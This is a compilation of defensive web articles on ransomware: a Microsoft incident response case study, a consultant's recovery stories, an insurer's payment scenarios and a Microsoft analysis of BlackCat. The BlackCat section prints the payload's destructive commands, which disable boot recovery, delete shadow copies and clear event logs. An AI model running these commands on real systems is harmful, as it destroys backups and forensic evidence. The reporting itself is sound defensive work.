a case study of ransomware

This browser is no longer supported.

Upgrade to Microsoft Edge to take advantage of the latest features, security updates, and technical support.

Microsoft Incident Response ransomware case study

• 6 contributors

Human-operated ransomware continues to maintain its position as one of the most impactful cyberattack trends world-wide and is a significant threat that many organizations have faced in recent years. These attacks take advantage of network misconfigurations and thrive on an organization's weak interior security. Although these attacks pose a clear and present danger to organizations and their IT infrastructure and data, they are a preventable disaster .

The Microsoft Incident Response team (formerly DART/CRSP) responds to security compromises to help customers become cyber-resilient. Microsoft Incident Response provides onsite reactive incident response and remote proactive investigations. Microsoft Incident Response leverages Microsoft's strategic partnerships with security organizations around the world and internal Microsoft product groups to provide the most complete and thorough investigation possible.

This article describes how Microsoft Incident Response investigated a recent ransomware incident with details on the attack tactics and detection mechanisms.

See Part 1 and Part 2 of Microsoft Incident Response's guide to combatting human-operated ransomware for more information.

Microsoft Incident Response leverages incident response tools and tactics to identify threat actor behaviors for human operated ransomware. Public information regarding ransomware events focuses on the end impact, but rarely highlights the details of the operation and how threat actors were able to escalate their access undetected to discover, monetize, and extort.

Here are some common techniques that attackers use for ransomware attacks based on MITRE ATT&CK tactics .

Microsoft Incident Response used Microsoft Defender for Endpoint to track the attacker through the environment, create a story depicting the incident, and then eradicate the threat and remediate. Once deployed, Defender for Endpoint began detecting successful logons from a brute force attack. Upon discovering this, Microsoft Incident Response reviewed the security data and found several vulnerable Internet-facing devices using the Remote Desktop Protocol (RDP).

After initial access was gained, the threat actor used the Mimikatz credential harvesting tool to dump password hashes, scanned for credentials stored in plaintext, created backdoors with Sticky Key manipulation, and moved laterally throughout the network using remote desktop sessions.

For this case study, here is the highlighted path that the attacker took.

The following sections describe additional details based on the MITRE ATT&CK tactics and include examples of how the threat actor activities were detected with the Microsoft Defender portal.

Initial access

Ransomware campaigns use well-known vulnerabilities for their initial entry, typically using phishing emails or weaknesses in perimeter defense such as devices with the enabled Remote Desktop service exposed on the Internet.

For this incident, Microsoft Incident Response managed to locate a device that had TCP port 3389 for RDP exposed to the Internet. This allowed threat actors to perform a brute-force authentication attack and gain the initial foothold.

Defender for Endpoint used threat intelligence to determine that there were numerous sign-ins from known brute-force sources and displayed them in the Microsoft Defender portal. Here's an example.

Reconnaissance

Once the initial access was successful, environment enumeration and device discovery began. These activities allowed the threat actors to identify information about the organization's internal network and target critical systems such as domain controllers, backup servers, databases, and cloud resources. After the enumeration and device discovery, the threat actors performed similar activities to identify vulnerable user accounts, groups, permissions, and software.

The threat actor leveraged Advanced IP Scanner, an IP address scanning tool, to enumerate the IP addresses used in the environment and perform subsequent port scanning. By scanning for open ports, the threat actor discovered devices that were accessible from the initially compromised device.

This activity was detected in Defender for Endpoint and used as an indicator of compromise (IoC) for further investigation. Here's an example.

Credential theft

After gaining initial access, the threat actors performed credential harvesting using the Mimikatz password retrieval tool and by searching for files containing “password” on initially compromised systems. These actions enabled the threat actors to access additional systems with legitimate credentials. In many situations, threat actors use these accounts to create additional accounts to maintain persistence after the initial compromised accounts are identified and remediated.

Here's an example of the detected use of the Mimikatz in the Microsoft Defender portal.

Lateral movement

Movement across endpoints can vary between different organizations, but threat actors commonly use different varieties of remote management software that already exists on the device. By utilizing methods of remote access that the IT department commonly uses in their day-to-day activities, threat actors can fly under the radar for extended periods of time.

Using Microsoft Defender for Identity, Microsoft Incident Response was able to map out the path that the threat actor took between devices, displaying the accounts that were used and accessed. Here's an example.

Defense evasion

To avoid detection, the threat actors used defense evasion techniques to avoid identification and achieve their objectives throughout the attack cycle. These techniques include disabling or tampering with anti-virus products, uninstalling or disabling security products or features, modifying firewall rules, and using obfuscation techniques to hide the artifacts of an intrusion from security products and services.

The threat actor for this incident used PowerShell to disable real-time protection for Microsoft Defender on Windows 11 and Windows 10 devices and local networking tools to open TCP port 3389 and allow RDP connections. These changes decreased the chances of detection in an environment because they modified system services that detect and alert on malicious activity.

Defender for Endpoint, however, cannot be disabled from the local device and was able to detect this activity. Here's an example.

Persistence

Persistence techniques include actions by threat actors to maintain consistent access to systems after efforts are made by security staff to regain control of compromised systems.

The threat actors for this incident used the Sticky Keys hack because it allows for remote execution of a binary inside the Windows operating system without authentication. They then used this capability to launch a Command Prompt and perform further attacks.

Here's an example of the detection of the Sticky Keys hack in the Microsoft Defender portal.

Threat actors typically encrypt files using applications or features that already exist within the environment. The use of PsExec, Group Policy, and Microsoft Endpoint Configuration Management are methods of deployment that allow an actor to quickly reach endpoints and systems without disrupting normal operations.

The threat actor for this incident leveraged PsExec to remotely launch an interactive PowerShell Script from various remote shares. This attack method randomizes distribution points and makes remediation more difficult during the final phase of the ransomware attack.

Ransomware execution

Ransomware execution is one of the primary methods that a threat actor uses to monetize their attack. Regardless of the execution methodology, distinct ransomware frameworks tend to have a common behavioral pattern once deployed:

• Obfuscate threat actor actions
• Establish persistence
• Disable windows error recovery and automatic repair
• Stop a list of services
• Terminate a list of processes
• Delete shadow copies and backups
• Encrypt files, potentially specifying custom exclusions
• Create a ransomware note

Here's an example of a ransomware note.

Additional ransomware resources

Key information from Microsoft:

• The growing threat of ransomware , Microsoft On the Issues blog post on July 20, 2021
• Human-operated ransomware
• Rapidly protect against ransomware and extortion
• 2021 Microsoft Digital Defense Report (see pages 10-19)
• Ransomware: A pervasive and ongoing threat threat analytics report in the Microsoft Defender portal
• Microsoft Incident Response ransomware approach and best practices

Microsoft 365:

• Deploy ransomware protection for your Microsoft 365 tenant
• Maximize Ransomware Resiliency with Azure and Microsoft 365
• Recover from a ransomware attack
• Malware and ransomware protection
• Protect your Windows 10 PC from ransomware
• Handling ransomware in SharePoint Online
• Threat analytics reports for ransomware in the Microsoft Defender portal

Microsoft Defender XDR:

• Find ransomware with advanced hunting

Microsoft Defender for Cloud Apps:

• Create anomaly detection policies in Defender for Cloud Apps

Microsoft Azure:

• Azure Defenses for Ransomware Attack
• Backup and restore plan to protect against ransomware
• Help protect from ransomware with Microsoft Azure Backup (26 minute video)
• Recovering from systemic identity compromise
• Advanced multistage attack detection in Microsoft Sentinel
• Fusion Detection for Ransomware in Microsoft Sentinel

Microsoft Security team blog posts:

3 steps to prevent and recover from ransomware (September 2021)

A guide to combatting human-operated ransomware: Part 1 (September 2021)

Key steps on how Microsoft Incident Response conducts ransomware incident investigations.

A guide to combatting human-operated ransomware: Part 2 (September 2021)

Recommendations and best practices.

Becoming resilient by understanding cybersecurity risks: Part 4—navigating current threats (May 2021)

See the Ransomware section.

Human-operated ransomware attacks: A preventable disaster (March 2020)

Includes attack chain analyses of actual attacks.

Ransomware response—to pay or not to pay? (December 2019)

Norsk Hydro responds to ransomware attack with transparency (December 2019)

Was this page helpful?

Coming soon: Throughout 2024 we will be phasing out GitHub Issues as the feedback mechanism for content and replacing it with a new feedback system. For more information see: https://aka.ms/ContentUserFeedback .

Submit and view feedback for

Additional resources

• Threats and vulnerabilities

Ransomware is malware that locks and encrypts a victim's data, files, devices or systems, rendering them inaccessible and unusable until the attacker receives a ransom payment. A ransomware attack can shut down a business for days, even weeks and -- even when the company pays the ransom -- there's no guarantee it will ever get its assets back, or that it won't be attacked again. This guide covers the history and basics of ransomware, identifies the most common targets and offers expert instructions on how to prevent an attack. Or, if the worst happens, how to recognize an attack's taken place and remove the ransomware as swiftly as possible.

Ransomware case study: recovery can be painful, in ransomware attacks, backups can save the day and the data. even so, recovery can still be expensive and painful, depending on the approach. learn more in this case study..

• Alissa Irei, Senior Site Editor

Seasoned IT consultant David Macias will never forget the day he visited a new client's website and watched in horror as it started automatically downloading ransomware before his eyes. He quickly disconnected his computer from the rest of the network, but not before the malware had encrypted 3 TB of data in a matter of seconds.

"I just couldn't believe it," said Macias, president and owner of ITRMS, a managed service provider in Riverside, Calif. "I'm an IT person, and I am [incredibly careful] about my security. I thought, 'How can this be happening to me?' I wasn't online gambling or shopping or going to any of the places you typically find this kind of stuff. I was just going to a website to help out a client, and bingo -- I got hit."

Macias received a message from the hackers demanding $800 in exchange for his data. "I told them they could go fly a kite," he said. He wiped his hard drive, performed a clean install and restored everything from backup. "I didn't lose anything other than about five days of work."

Ransomware case study: Attack #2

A few years later, another of Macias' clients -- the owner of a direct-mail printing service -- called to report he couldn't access his server. Macias logged into the network through a remote desktop and saw someone had broken through the firewall. "I told the client, 'Run as fast as you can and unplug all the computers in the network,'" he said. This short-circuited the attack, but the attacker still managed to encrypt the server, five out of 15 workstations and the local backup.

This article is part of

What is ransomware? How it works and how to remove it

• Which also includes:
• The 10 biggest ransomware attacks in history
• How to recover from a ransomware attack
• How to prevent ransomware in 6 steps

"What made this ransomware attack so bad was that it attacked the private partition that lets you restore the operating system," Macias added. Although the ransom demanded was again only $800, he advised against paying , since attackers often leave backdoors in a network and can return to steal data or demand more money.

What made this ransomware attack so bad was that it attacked the private partition that lets you restore the operating system. David Macias President, ITRMS

Fortunately, Macias had a full image-based backup of the client's network saved to a cloud service. Even so, recovery was expensive, tedious and time-consuming. He had to reformat the hard drive manually, rebuild the server from scratch and reinstall every single network device. The process took about a week and a half and cost $15,000. "The client was just incredibly grateful that all their data was intact," Macias said.

Although pleased the client's data loss was negligible, Macias wanted to find a more efficient, less painful disaster recovery strategy . Shortly after the second ransomware incident, he learned about a company called NeuShield that promised one-click backup restoration. He bought the technology for his own network and also sold it to the client that had been attacked. According to NeuShield, its Data Sentinel technology works by showing an attacker a mirror image of a computer's data, thus protecting the original files and maintaining access to them, even if encryption takes place.

Ransomware case study: Attack #3

The printing services company experienced another ransomware incident a couple of years later, when its owner was working from home and using a remote desktop without a VPN . A malicious hacker gained entry through TCP port 3389 and deployed ransomware, encrypting critical data.

In this instance, however, Macias said NeuShield enabled him to restore the system with a simple click and reboot. "When they got hit the first time, it took forever to restore. The second time, they were back up and running in a manner of minutes," he said.

While he praised NeuShield's technology, Macias noted it doesn't negate the need for antivirus protection to guard against common malware threats or for cloud backup in case of fires, earthquakes or other disasters. "Unfortunately, there's no one-stop solution," he said. "I wish there was one product that included everything, but there isn't."

Macias said he knows from personal experience, however, that investing upfront can prevent massive losses down the road. "I've had clients tell me, 'I'll worry about it when it happens.' But that's like driving without insurance. Once you get into an accident, it's too late."

How to create a ransomware incident response plan

Best practices for reporting ransomware attack

How to remove ransomware, step by step

17 ransomware removal tools to protect enterprise networks

4 tips to find cyber insurance coverage in 2023

Related Resources

• The Buyer’s Guide to Software Supply Chain Security –ReversingLabs
• The Guide to Cyber Incident Response Planning –NCC Group
• Demystifying the myths of public cloud computing –TechTarget ComputerWeekly.com
• Towards an Autonomous Vehicle Enabled Society: Cyber Attacks and Countermeasures –TechTarget ComputerWeekly.com

Dig Deeper on Threats and vulnerabilities

MSP shares details of Kaseya VSA ransomware attack, recovery

Podcast: Ransomware, data protection and compliance

Ransomware, storage and backup: Impacts, limits and capabilities

How to prepare for ransomware

Cisco cuts its workforce by 7% and forms one unit for networking, security and collaboration to energize AI and security sales. ...

OWC transfers data using highly directional light in free space. While OWC delivers high-speed data transfers, it is susceptible ...

Network architects face challenges when considering a network upgrade, but enterprises can keep problems to a minimum by ...

The next U.S. president will set the tone on tech issues such as AI regulation, data privacy and climate tech. This guide breaks ...

A challenge companies are facing while preparing for compliance with climate risk reporting rules is a lack of consistency among ...

Key leadership decisions like poor architecture to rushed processes can lead to technical debt that will affect a company ...

IT administrators had to jump into action after the CrowdStrike outage to recover faulty desktops. Learn how to use the Microsoft...

Enterprises with the IT talent might turn to open-source software as a backup for commercial products to mitigate damage from a ...

Copilot is a powerful generative AI technology with lots of integrations with Microsoft technology. But the usefulness of this ...

The better your cloud-native development process is, the more efficient and reliable your application is likely to be. Follow ...

The different types of private cloud offer varying levels of control, customization and convenience. These factors affect the ...

Private cloud doesn't have to break the bank. Use these best practices to implement an intentional cost management strategy that ...

Google's revised approach to third-party cookies shouldn't come as a surprise, and may also be welcome

Despite the complexity and evolving nature of threats, with the right strategy, tools, and constant vigilance, businesses can ...

Data from Synergy Research Group confirms the majority of the world’s 20 biggest hyperscale datacentre hubs are in the US, but ...

For the best Oliver Wyman website experience, please upgrade your browser to IE9 or later

Surviving a Ransomware Attack: A Case Study

A project manager for ABC Inc., a manufacturer with $1 billion in annual revenue and operations in 30 countries steps off the elevator at company headquarters. She’s returning to her office after a lunch break and is eager to get back to work on a major order for a large client that is due next week. But something’s wrong.

When she sits down at her desk, she sees that her computer does not seem to be functioning. Instead of the usual desktop image on her monitor, she instead sees a lock and a disturbing message:

Your files are encrypted. If you do not submit payment to us — $5 million in bitcoin — within three days, your files will be lost forever.

Worried, she calls ABC’s IT manager on the other side of the floor, but the IT manager and his staff are too busy to answer. Other employees around the world are reporting that procurement and shipping software is inaccessible. At the company’s factories in China, India, and elsewhere, assembly lines have come to a halt. And that same message is being seen on computers at every company office.

The company is a victim of ransomware — an attack that is growing increasingly more frequent, severe, and sophisticated.

A ransomware attack can disrupt a business for weeks, cost millions of dollars in downtime and restoration costs, and damage reputations. Millions more is often needed to pay the actual ransom. Personal information may also be exposed, resulting in significant costs for breach notification and credit monitoring. But with the right advisor and with effective planning and preparation, a business can weather the storm and take action to protect its operations, systems, revenue, and reputation.

Marsh can be that advisor to your organization, delivering recommendations before, during, and after an incident. Here’s how a ransomware attack can play out, and how we can help you manage its impacts on your organization.

To Pay or Not to Pay

As critical data is held hostage and systems are rendered inoperable, ABC finds itself in an untenable situation. Operations are completely halted; the technology that powers ABC’s manufacturing line is down. Employees cannot perform critical tasks — they cannot order components that go into their products, nor can they ship finished goods to customers.

With contractual obligations not being met and assembly lines idling, the company is losing money — every hour, every minute, every second. And with the threat actor’s deadline looming, ABC’s risk management and leadership teams face a critical decision:  Should we pay the ransom?

Several factors should go into this decision. These include the criticality of affected data and systems, availability and integrity of data backups, cost of the ransom versus the estimated cost of restoration, the likelihood of successful restoration (whether the ransom is paid or not), and regulatory implications.

Organizations should develop guidance regarding ransomware decision-making and build this into their incident response plans. Generally, choosing to pay or not requires careful consideration and input from key stakeholders, including in-house and outside legal counsel and vendors.

As ABC considers its options, it can rely on Marsh for help.

Scenario 1: Paying the Ransom

ABC makes the decision to pay the ransom after determining that restoring its systems, files, and data is not possible — or at all timely. ABC quickly engages a law firm with specific expertise in ransomware to serve as the incident response coordinator.

Computer forensic teams actively investigate the incident and try to determine its scope while working to limit the spread of the malware. Crisis management and public relations teams are engaged to manage reputational harm.

ABC, meanwhile, is also busy getting the necessary internal authorizations and working with third parties to prepare for a cryptocurrency payment. Legal and regulatory checks must be performed, such as a review of whether payment is possible under rules established by the  Office of Foreign Asset Control , which prohibits payment to certain sanctioned foreign parties.

A ransomware response vendor, meanwhile, begins negotiating with attackers on ABC’s behalf for a reduction in payment demands and a later deadline. The vendor’s specialists have seen this strain of ransomware before and understand how the threat actor group operates.

After initial communication with the threat actor group’s “PR department,” the vendor engages the threat actor group’s “finance department” and succeeds in extending the payment deadline and cutting the required payment to $2 million in bitcoin. The ransomware response firm also tests the decryption keys to make sure they work.

ABC is ready to make payment. The company works with its legal advisors and ransomware response vendor to make a bitcoin payment to the cyber-attackers four days after the ransomware message first appeared. In exchange, its IT team receives a decryption key to restore access to the network.

The work, however, is far from over. It may take weeks to deploy the decryption keys across ABC’s network and restore all impacted systems to full functionality. Additional forensics may be necessary to confirm there are no remnants of the malware, that backdoors are identified and eliminated, and that systems have been scrubbed clean.

Backups will need to be reconfigured and tested and data may need to be restored. To prevent incident reoccurrence, new hardware or software may also be needed as a part of reengineering IT systems and boundaries. The overall focus of reengineering is to improve the overall security environment and support improved cybersecurity monitoring.

ABC’s cyber insurance coverage, secured with the help of its brokers at Marsh, can prove useful. ABC’s cyber policy will reimburse the ransomware payment and cover the costs of the vendors that helped with the negotiation. Incident response, including attorney fees, PR expenses, and data restoration costs will also be covered, as is lost income during ABC’s downtime and extra expenses that might have been incurred to keep operating.

In addition to securing your cyber policy, Marsh can help you navigate the carrier's vendor and ransomware reimbursement consent requirements. And we can help you prepare a business interruption claim to ensure that you maximize your cyber insurance coverage.

As ABC returns to some semblance of normalcy, the assembly line once again begins to hum.

Scenario 2: Not Paying the Ransom

In ABC’s executive offices, the ransomware demand sparks heated debate. While some argue in favor of paying quickly to minimize the damage and resume operations as quickly as possible, company leadership ultimately concludes that the company will be able to make a near full recovery using its offline backups.

After engaging a ransomware response vendor, ABC also learns that the attackers hardly ever deliver a working decryptor key. For these reasons, ABC decides not to pay the ransom.

Instead, ABC works with its advisors — including consultants from Marsh, experienced cyber legal counsel, forensic analysts, and others — to determine the extent of attackers’ presence within their networks and what data and systems may be compromised. Efforts are taken to contain the malware and to isolate and remediate impacted systems. Once the network is scrubbed clean, ABC then takes steps to restore backups and rebuild critical datasets.

ABC’s cyber insurance coverage can again prove useful, responding in many of the same ways as if the company had paid the ransom. Its policy provides coverage for incident response, data restoration, business interruption, and extra expenses.

One week after the ransomware message first appeared, ABC successfully starts restoring access to its core systems and backup data, though the process is still a long one. As ABC rebuilds its IT infrastructure, some legacy systems need to be replaced. While operations can resume as active monitoring for indicators of compromise (IoCs) continues, ABC is only operating at 50% capacity. Once the network is scrubbed clean and purged of malware, the company gradually increases its capacity to get back up and running again.

Three weeks out, factory operations resume at 100% capacity and affected employees fully return to work. ABC can once again focus on its core mission of delivering high-quality manufactured goods to its customers.

Managing Claims

With cyber insurance responding in either scenario, the next phase for ABC is to seek recovery.

With help from Marsh, which regularly communicated with insurers as the company responded to the ransomware attack, ABC’s risk management team gets to work capturing loss estimates tied to its downtime following the attack and cataloguing extra expenses incurred while responding. Documenting and capturing decisions regarding activities and resources during the incident as they are made is critical to ABC’s successful claim development — and Marsh supports the process to help maximize insurance recovery

Once this information is in hand, ABC provides its cyber insurer with a detailed submission. Ultimately, the company is able to recoup the reasonable and necessary costs from the incident — subject to self-insured retentions — under the terms of its well-crafted cyber insurance policy.

Post-Incident Steps

The ransomware attack is over; ABC has weathered the storm. But there’s still one final step in the process.

As part of its cyber incident response plan, ABC’s final action is to conduct an after-action review. The purpose of this exercise is to understand and document what went well and what didn’t — and how to address any gaps or weaknesses. That’s a critical step to take in order to ensure ABC learns from the incident and is better prepared for the possibility of a future attack, which may be similar to the last one — or completely different.

With the help of a forensics provider, ABC learns that the ransomware entered its networks through a phishing campaign and was able to spread across its network with ease, scooping up administrative credentials along the way and even credentials for the company’s industrial control systems. Armed with these findings, ABC develops an action plan to harden its cybersecurity with additional phishing tests, new multifactor authentication initiatives, and improved network segmentation based on system and data criticality. ABC also re-evaluates its cyber insurance limits as risk transfer has proven to be both critical and complementary to ABC’s risk mitigation efforts.

As part of this exercise, the both Marsh and ABC review ABC’s cyber incident response plan. Like a number of its peers, ABC’s plan — while robust in many ways — did not specifically address a ransomware attack. But developing a plan specific to ransomware is critical to making timely decisions.

Working with Marsh and external partners, ABC is able to update its internal guidance around ransomware attacks, perform an IoC assessment, identify and document vulnerabilities or gaps, and review its backup strategy – and critically, align all key stakeholders around ABC’s strategies to manage the organization’s cyber risk. The bottom line: ABC is more confident, more aligned, better prepared, and better protected in the event of another ransomware attack in the future.

How Else Can Marsh Help You Manage Ransomware Threats?

Beyond providing support following an attack, Marsh can also help your organization address potential ransomware threats on an ongoing basis. We can offer:

• Ransomware Insights:  An intelligence briefing detailing the ransomware environment, your potential vulnerabilities, top attack vectors, best practices for you to follow, and potential cost estimates.
• Insurance Program Design:  Advice and guidance on key policy terms and conditions and program structures, insight into underwriters’ priorities and objectives, and aggressive marketing on your behalf.
• Ransomware Readiness Assessment:  A review of your current operations, with feedback and analysis based on best practices sourced from assessments of more than 1,400 businesses.
• Cyber Financial Stress Test:  An estimate of the potential total cost of a ransomware or other cyber incident on your organization, which can inform critical decisions about cyber insurance and risk management strategies and investments.
• Cyber Incident Response Plan:  Assistance in building or revising an existing plan to help you respond to a cyber event, with specific considerations for ransomware.
• Cybersecurity Program Review:  A review of an organization’s cybersecurity policies, plans, procedures, and training that culminates in a maturity assessment and actionable recommendations for improvement.

Reid Sawyer

Head, US Cyber Risk Consulting, Marsh

James Holtzclaw

Senior Vice President, Cybersecurity Consulting and Advisory Services, Marsh Risk Consulting (MRC)

Susan Young

Managing Director, Cyber Practice, Marsh US

• Threat intelligence

The many lives of BlackCat ransomware

• By Microsoft Threat Intelligence

Credential theft

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. DEV-0237 is now tracked as Pistachio Tempest and DEV-504 is now tracked as Velvet Tempest . To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy .

The BlackCat ransomware, also known as ALPHV , is a prevalent threat and a prime example of the growing ransomware as a service (RaaS) gig economy. It’s noteworthy due to its unconventional programming language (Rust), multiple target devices and possible entry points, and affiliation with prolific threat activity groups. While BlackCat’s arrival and execution vary based on the actors deploying it, the outcome is the same—target data is encrypted, exfiltrated, and used for “double extortion,” where attackers threaten to release the stolen data to the public if the ransom isn’t paid.

First observed in November 2021, BlackCat initially made headlines because it was one of the first ransomware families written in the Rust programming language. By using a modern language for its payload, this ransomware attempts to evade detection, especially by conventional security solutions that might still be catching up in their ability to analyze and parse binaries written in such language. BlackCat can also target multiple devices and operating systems. Microsoft has observed successful attacks against Windows and Linux devices and VMWare instances.

As we previously explained , the RaaS affiliate model consists of multiple players: access brokers, who compromise networks and maintain persistence; RaaS operators, who develop tools; and RaaS affiliates, who perform other activities like moving laterally across the network and exfiltrating data before ultimately launching the ransomware payload. Thus, as a RaaS payload, how BlackCat enters a target organization’s network varies, depending on the RaaS affiliate that deploys it. For example, while the common entry vectors for these threat actors include remote desktop applications and compromised credentials, we also saw a threat actor leverage Exchange server vulnerabilities to gain target network access. In addition, at least two known affiliates are now adopting BlackCat: DEV-0237 (known for previously deploying Ryuk, Conti, and Hive) and DEV-0504 (previously deployed Ryuk, REvil, BlackMatter, and Conti).

Such variations and adoptions markedly increase an organization’s risk of encountering BlackCat and pose challenges in detecting and defending against it because these actors and groups have different tactics, techniques, and procedures (TTPs). Thus, no two BlackCat “lives” or deployments might look the same. Indeed, based on Microsoft threat data, the impact of this ransomware has been noted in various countries and regions in Africa, the Americas, Asia, and Europe.

Human-operated ransomware attacks like those that deploy BlackCat continue to evolve and remain one of the attackers’ preferred methods to monetize their attacks. Organizations should consider complementing their security best practices and policies with a comprehensive solution like Microsoft 365 Defender , which offers protection capabilities that correlate various threat signals to detect and block such attacks and their follow-on activities.

In this blog, we provide details about the ransomware’s techniques and capabilities. We also take a deep dive into two incidents we’ve observed where BlackCat was deployed, as well as additional information about the threat activity groups that now deliver it. Finally, we offer best practices and recommendations to help defenders protect their organizations against this threat, including hunting queries and product-specific mitigations.

BlackCat’s anatomy: Payload capabilities

As mentioned earlier, BlackCat is one of the first ransomware written in the Rust programming language. Its use of a modern language exemplifies a recent trend where threat actors switch to languages like Rust or Go for their payloads in their attempt to not only avoid detection by conventional security solutions but also to challenge defenders who may be trying to reverse engineer the said payloads or compare them to similar threats.

BlackCat can target and encrypt Windows and Linux devices and VMWare instances. It has extensive capabilities, including self-propagation configurable by an affiliate for their usage and to environment encountered.

In the instances we’ve observed where the BlackCat payload did not have administrator privileges, the payload was launched via dllhost.exe , which then launched the following commands below (Table 1) via cmd.exe . These commands could vary, as the BlackCat payload allows affiliates to customize execution to the environment.

The flags used by the attackers and the options available were the following: -s -d -f -c ; –access-token ; –propagated ; -no-prop-servers

User account control (UAC) bypass

BlackCat can bypass UAC, which means the payload will successfully run even if it runs from a non-administrator context. If the ransomware isn’t run with administrative privileges, it runs a secondary process under dllhost.exe with sufficient permissions needed to encrypt the maximum number of files on the system.

Domain and device enumeration

The ransomware can determine the computer name of the given system, local drives on a device, and the AD domain name and username on a device. The malware can also identify whether a user has domain admin privileges, thus increasing its capability of ransoming more devices.

Self-propagation

BlackCat discovers all servers that are connected to a network. The process first broadcasts NetBIOS Name Service (NBNC) messages to check for these additional devices. The ransomware then attempts to replicate itself on the answering servers using the credentials specified within the config via PsExec.

Hampering recovery efforts

BlackCat has numerous methods to make recovery efforts more difficult. The following are commands that might be launched by the payload, as well as their purposes:

• “C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”
• “C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”
• “C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”
• “C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”
• “C:\Windows\system32\cmd.exe” /c “cmd.exe /c  for /F \”tokens=*\” Incorrect function. in (‘ wevtutil.exe el ‘) DO wevtutil.exe cl \”Incorrect function. \””

Slinking its way in: Identifying attacks that can lead to BlackCat ransomware

Consistent with the RaaS model, threat actors utilize BlackCat as an additional payload to their ongoing campaigns. While their TTPs remain largely the same (for example, using tools like Mimikatz and PsExec to deploy the ransomware payload), BlackCat-related compromises have varying entry vectors, depending on the ransomware affiliate conducting the attack. Therefore, the pre-ransom steps of these attacks can also be markedly different.

For example, our research noted that one affiliate that deployed BlackCat leveraged unpatched Exchange servers or used stolen credentials to access target networks. The following sections detail the end-to-end attack chains of these two incidents we’ve observed.

Case study 1: Entry via unpatched Exchange

In one incident we’ve observed, attackers took advantage of an unpatched Exchange server to enter the target organization.

Upon exploiting the Exchange vulnerability, the attackers launched the following discovery commands to gather information about the device they had compromised:

• cmd.exe and the commands ver and systeminfo – to collect operating system information
• net.exe – to determine domain computers, domain controllers, and domain admins in the environment

After executing these commands, the attackers navigated through directories and discovered a passwords folder that granted them access to account credentials they could use in the subsequent stages of the attack. They also used the del command to delete files related to their initial compromise activity.

The attackers then mounted a network share using net use and the stolen credentials and began looking for potential lateral movement targets using a combination of methods. First, they used WMIC.exe using the previously gathered device name as the node, launched the command whoami /all , and pinged google.com to check network connectivity. The output of the results were then written to a .log file on the mounted share. Second, the attackers used PowerShell.exe with the cmdlet Get-ADComputer and a filter to gather the last sign-in event.

Lateral movement

Two and a half days later, the attackers signed into one of the target devices they found during their initial discovery efforts using compromised credentials via interactive sign-in. They opted for a credential theft technique that didn’t require dropping a file like Mimikatz that antivirus products might detect. Instead, they opened Taskmgr.exe , created a dump file of the LSASS.exe process, and saved the file to a ZIP archive.

The attackers continued their previous discovery efforts using a PowerShell script version of ADRecon ( ADRecon.ps1 ), which is a tool designed to gather extensive information about an Active Directory (AD) environment. The attacker followed up this action with a net scanning tool that opened connections to devices in the organization on server message block (SMB) and remote desktop protocol (RDP). For discovered devices, the attackers attempted to navigate to various network shares and used the Remote Desktop client ( mstsc.exe ) to sign into these devices, once again using the compromised account credentials.

These behaviors continued for days, with the attackers signing into numerous devices throughout the organization, dumping credentials, and determining what devices they could access.

Collection and exfiltration

On many of the devices the attackers signed into, efforts were made to collect and exfiltrate extensive amounts of data from the organization, including domain settings and information and intellectual property. To do this, the attackers used both MEGAsync and Rclone, which were renamed as legitimate Windows process names (for example, winlogon.exe , mstsc.exe ).

Exfiltration of domain information to identify targets for lateral movement

Collecting domain information allowed the attackers to progress further in their attack because the said information could identify potential targets for lateral movement or those that would help the attackers distribute their ransomware payload. To do this, the attackers once again used ADRecon.ps1 with numerous PowerShell cmdlets such as the following:

• Get-ADRGPO – gets group policy objects (GPO) in a domain
• Get-ADRDNSZone – gets all DNS zones and records in a domain
• Get-ADRGPLink – gets all group policy links applied to a scope of management in a domain

Additionally, the attackers dropped and used ADFind.exe commands to gather information on persons, computers, organizational units, and trust information, as well as pinged dozens of devices to check connectivity.

Exfiltration for double extortion

Intellectual property theft likely allowed the attackers to threaten the release of information if the subsequent ransom wasn’t paid—a practice known as “double extortion.” To steal intellectual property, the attackers targeted and collected data from SQL databases. They also navigated through directories and project folders, among others, of each device they could access, then exfiltrated the data they found in those. 

The exfiltration occurred for multiple days on multiple devices, which allowed the attackers to gather large volumes of information that they could then use for double extortion.

Encryption and ransom

It was a full two weeks from the initial compromise before the attackers progressed to ransomware deployment, thus highlighting the need for triaging and scoping out alert activity to understand accounts and the scope of access an attacker gained from their activity. Distribution of the ransomware payload using PsExec.exe proved to be the most common attack method.

Case study 2: Entry via compromised credentials

In another incident we observed, we found that a ransomware affiliate gained initial access to the environment via an internet-facing Remote Desktop server using compromised credentials to sign in.

Once the attackers gained access to the target environment, they then used SMB to copy over and launch the Total Deployment Software administrative tool, allowing remote automated software deployment. Once this tool was installed, the attackers used it to install ScreenConnect (now known as ConnectWise), a remote desktop software application.

ScreenConnect was used to establish a remote session on the device, allowing attackers interactive control. With the device in their control, the attackers used cmd.exe to update the Registry to allow cleartext authentication via WDigest, and thus saved the attackers time by not having to crack password hashes. Shortly later, they used the Task Manager to dump the LSASS.exe process to steal the password, now in cleartext.

Eight hours later, the attackers reconnected to the device and stole credentials again. This time, however, they dropped and launched Mimikatz for the credential theft routine, likely because it can grab credentials beyond those stored in LSASS.exe . The attackers then signed out.

Persistence and encryption

A day later, the attackers returned to the environment using ScreenConnect. They used PowerShell to launch a command prompt process and then added a user account to the device using net.exe . The new user was then added to the local administrator group via net.exe .

Afterward, the attackers signed in using their newly created user account and began dropping and launching the ransomware payload. This account would also serve as a means of additional persistence beyond ScreenConnect and their other footholds in the environment to allow them to re-establish their presence, if needed. Ransomware adversaries are not above ransoming the same organization twice if access is not fully remediated.

Chrome.exe was used to navigate to a domain hosting the BlackCat payload. Notably, the folder structure included the organization name, indicating that this was a pre-staged payload specifically for the organization. Finally, the attackers launched the BlackCat payload on the device to encrypt its data.

Ransomware affiliates deploying BlackCat

Apart from the incidents discussed earlier, we’ve also observed two of the most prolific affiliate groups associated with ransomware deployments have switched to deploying BlackCat. Payload switching is typical for some RaaS affiliates to ensure business continuity or if there’s a possibility of better profit. Unfortunately for organizations, such adoption further adds to the challenge of detecting related threats.

